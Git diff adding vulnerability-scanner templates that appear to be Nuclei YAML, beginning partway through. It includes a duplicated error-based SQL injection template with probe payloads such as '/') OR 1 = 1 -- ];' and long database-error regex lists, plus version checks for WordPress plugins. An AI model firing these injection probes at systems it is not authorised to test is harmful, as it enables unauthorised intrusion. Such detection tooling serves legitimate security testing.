type: dsl + dsl: + - compare_versions(version, '<= 4.3.11') \ No newline at end of file diff --git a/poc/sql/error-sqli.yaml b/poc/sql/error-sqli.yaml new file mode 100644 index 0000000000..1b9ef0c64e --- /dev/null +++ b/poc/sql/error-sqli.yaml @@ -0,0 +1,508 @@ +id: error-sqli +info: + name: Blind SQL Injection time based detection of sql backend + author: oscuridad1010 + severity: High + tags: sql0 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + sqloscuridad: + - "'" + - "-1" + - "%22%22|0;#" + - "%22" + - "/') OR 1 = 1 -- ];" + - "%E2%84%A2%22" + - "%E2%84%A2%27" + + stop-at-first-match: true + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{sqloscuridad}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "You have an error in your SQL syntax" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + # HQL + - "org\\.hibernate\\.QueryException:" + - "org\\.hibernate\\.exception\\.SQLGrammarException" + - "mismatched input ''" + - '' + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "You have an error in your SQL syntax" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + + - type: regex + name: HQLSQL + regex: + - "org\\.hibernate\\.QueryException:" + - "org\\.hibernate\\.exception\\.SQLGrammarException" + - "mismatched input ''" + - '' + diff --git a/poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml b/poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml new file mode 100644 index 0000000000..5b7fae3efe --- /dev/null +++ b/poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml @@ -0,0 +1,59 @@ +id: nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169 + +info: + name: > + Nokaut Offers Box <= 1.4.0 - Cross-Site Request Forgery to Plugin Setting Reset + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f6d43ad-d1b9-4f66-ba08-d0ffc235f7c8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/nokaut-offers-box/" + google-query: inurl:"/wp-content/plugins/nokaut-offers-box/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,nokaut-offers-box,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nokaut-offers-box/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nokaut-offers-box" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file diff --git a/poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml b/poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml new file mode 100644 index 0000000000..7605a82525 --- /dev/null +++ b/poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml @@ -0,0 +1,59 @@ +id: nokaut-offers-box-d698070b224b4726dbc297056bea4cbe + +info: + name: > + Nokaut Offers Box <= 1.4.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e0dd2417-54b5-4838-88da-1893559bd255?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/nokaut-offers-box/" + google-query: inurl:"/wp-content/plugins/nokaut-offers-box/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,nokaut-offers-box,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nokaut-offers-box/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nokaut-offers-box" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file diff --git a/poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml b/poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml new file mode 100644 index 0000000000..240903a856 --- /dev/null +++ b/poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml @@ -0,0 +1,59 @@ +id: twitter-posts-8f2dbde369351cc27693796adbcd9a58 + +info: + name: > + TwitterPosts <= 1.0.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66f82859-1798-42ed-bb6a-44b0af438c7f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/twitter-posts/" + google-query: inurl:"/wp-content/plugins/twitter-posts/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,twitter-posts,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/twitter-posts/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "twitter-posts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/sql_injection/error-sqli.yaml b/poc/sql_injection/error-sqli.yaml new file mode 100644 index 0000000000..1b9ef0c64e --- /dev/null +++ b/poc/sql_injection/error-sqli.yaml @@ -0,0 +1,508 @@ +id: error-sqli +info: + name: Blind SQL Injection time based detection of sql backend + author: oscuridad1010 + severity: High + tags: sql0 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + sqloscuridad: + - "'" + - "-1" + - "%22%22|0;#" + - "%22" + - "/') OR 1 = 1 -- ];" + - "%E2%84%A2%22" + - "%E2%84%A2%27" + + stop-at-first-match: true + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{sqloscuridad}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "You have an error in your SQL syntax" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + # HQL + - "org\\.hibernate\\.QueryException:" + - "org\\.hibernate\\.exception\\.SQLGrammarException" + - "mismatched input ''" + - '' + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "You have an error in your SQL syntax" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - 